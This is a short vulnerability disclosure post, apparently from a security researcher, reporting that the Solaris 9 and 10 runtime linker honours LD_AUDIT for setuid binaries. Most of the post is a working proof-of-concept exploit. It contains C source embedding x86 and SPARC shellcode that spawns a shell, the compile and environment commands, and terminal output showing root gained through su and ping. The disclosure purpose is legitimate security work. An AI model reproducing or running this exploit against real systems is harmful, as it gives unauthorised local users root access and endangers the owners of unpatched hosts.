ld.so from Solaris 9 and 10 doesn't check LD_AUDIT environment variable when running s[ug]id binaries, allowing to run arbitrary code with elevated privileges. Well, I can't belive, that such trivial vulnerability exists in modern OS... The following PoC code was tested on: - SunOS 5.10 Generic i86pc i386 i86pc - SunOS 5.9 Generic_112233-12 sun4u It does NOT work on: SunOS 5.8 Generic_117350-02 sun4u sparc Example on unpatched Solaris 10 (AMD64): atari:venglin:~> cat dupa.c static char sh[] = "\x31\xc0\xeb\x09\x5a\x89\x42\x01\x88\x42\x06\xeb\x0d\xe8\xf2\xff\xff\xff\x9a\x01\x01\x01\x01\x07\x01\xc3\x50\xb0\x17\xe8\xf0\xff\xff\xff\x31\xc0\x68\x2f\x73\x68\x5f\x68\x2f\x62\x69\x6e\x88\x44\x24\x07\x89\xe3\x50\x53\x8d\x0c\x24\x8d\x54\x24\x04\x52\x51\x53\xb0\x0b\xe8\xcb\xff\xff\xff"; int la_version() { void (*f)(); f = (void*)sh; f(); return 3; } atari:venglin:~> gcc -fPIC -shared -o /tmp/dupa.so dupa.c atari:venglin:~> setenv LD_AUDIT /tmp/dupa.so atari:venglin:~> su # id uid=0(root) gid=10(staff) Solaris 9 on SPARC: $ cat dupa.c char sh[] = /* setuid() */ "\x90\x08\x3f\xff\x82\x10\x20\x17\x91\xd0\x20\x08" /* execve() */ "\x20\xbf\xff\xff\x20\xbf\xff\xff\x7f\xff\xff\xff\x90\x03\xe0\x20" "\x92\x02\x20\x10\xc0\x22\x20\x08\xd0\x22\x20\x10\xc0\x22\x20\x14" "\x82\x10\x20\x0b\x91\xd0\x20\x08/bin/ksh"; int la_version() { void (*f)(); f = (void*)sh; f(); return 3; } $ gcc -fPIC -shared -o /tmp/dupa.so dupa.c $ export LD_AUDIT=/tmp/dupa.so $ ping # id uid=0(root) gid=100(student) -- * Fido: 2:480/124 ** WWW: http://www.frasunek.com/ ** NICHDL: PMF9-RIPE * * JID: venglin@jabber.atman.pl ** PGP ID: 2578FCAD ** HAM-RADIO: SQ8JIV *